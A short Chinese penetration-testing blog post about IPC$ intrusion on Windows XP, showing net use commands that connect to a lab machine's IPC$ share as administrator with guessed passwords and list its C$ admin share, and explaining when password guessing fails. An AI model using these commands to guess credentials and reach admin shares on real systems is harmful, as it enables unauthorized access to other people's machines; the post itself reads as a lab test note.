最新消息:

关于IPC入侵的一些细节

渗透相关 exchen 509浏览 0评论

第一种情况:
文件夹选项-查看-使用简单文件共享,如果选择了这个选择,那么IPC输入任一密码都可以建立成功,但是没有权限上传文件.这时IPC破解可以说不好使了.
测试:
C:\Users\exchen>net use
会记录新的网络连接。
列表是空的。

C:\Users\exchen>net use \\192.168.1.137\ipc$ “12xxx” /user:”administrator”
命令成功完成。

C:\Users\exchen>dir “\\192.168.1.137”
文件名、目录名或卷标语法不正确。
C:\Users\exchen>dir “\\192.168.1.137\C$”
拒绝访问。
C:\Users\exchen>net use
会记录新的网络连接。

状态 本地 远程 网络
——————————————————————————-
OK \\192.168.1.137\ipc$ Microsoft Windows Network
命令成功完成。

C:\Users\exchen>net use \\192.168.1.137 /del
\\192.168.1.137 已经删除。

C:\Users\exchen>net use
会记录新的网络连接。
列表是空的。
——————————————————————————————————-
当去掉使用简单文件共享的时候,再输入一个错误的密码就会提示密码错误
C:\Users\exchen>net use \\192.168.1.137\ipc$ “12xxx” /user:”administrator”
发生系统错误 1326。
登录失败: 未知的用户名或错误密码。
——————————————————————————————————-
而输入正确密码,就可以有权限dir
C:\Users\exchen>net use \\192.168.1.137\ipc$ “123” /user:”administrator”
命令成功完成。

C:\Users\exchen>dir “\\192.168.1.137\C$”
驱动器 \\192.168.1.137\C$ 中的卷没有标签。
卷的序列号是 009F-6DC7
\\192.168.1.137\C$ 的目录
2013/01/04 14:55 40,960 1.dll
2012/11/30 13:27 6,768 1.txt
2012/12/11 18:05 217,600 123.dll
2013/01/04 14:59 40,960 2.dll
2012/11/30 15:05 32,863 2.txt
2012/11/30 15:31 75 3.txt
2013/04/18 15:01

alg
2013/04/18 14:53 73,119 alg.rar
——————————————————————————————-

第二种情况:
当管理员用户是空密码的时候,可以说IPC破解也不好使了
测试:
C:\Users\exchen>net use \\192.168.1.137\ipc$ “” /user:”administrator”
命令成功完成。

C:\Users\exchen>dir “\\192.168.1.137\C$”
拒绝访问。
———————————————————————————————–

以上测试机是XP系统,其他系统暂未测试!

转载请注明:exchen's blog » 关于IPC入侵的一些细节

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址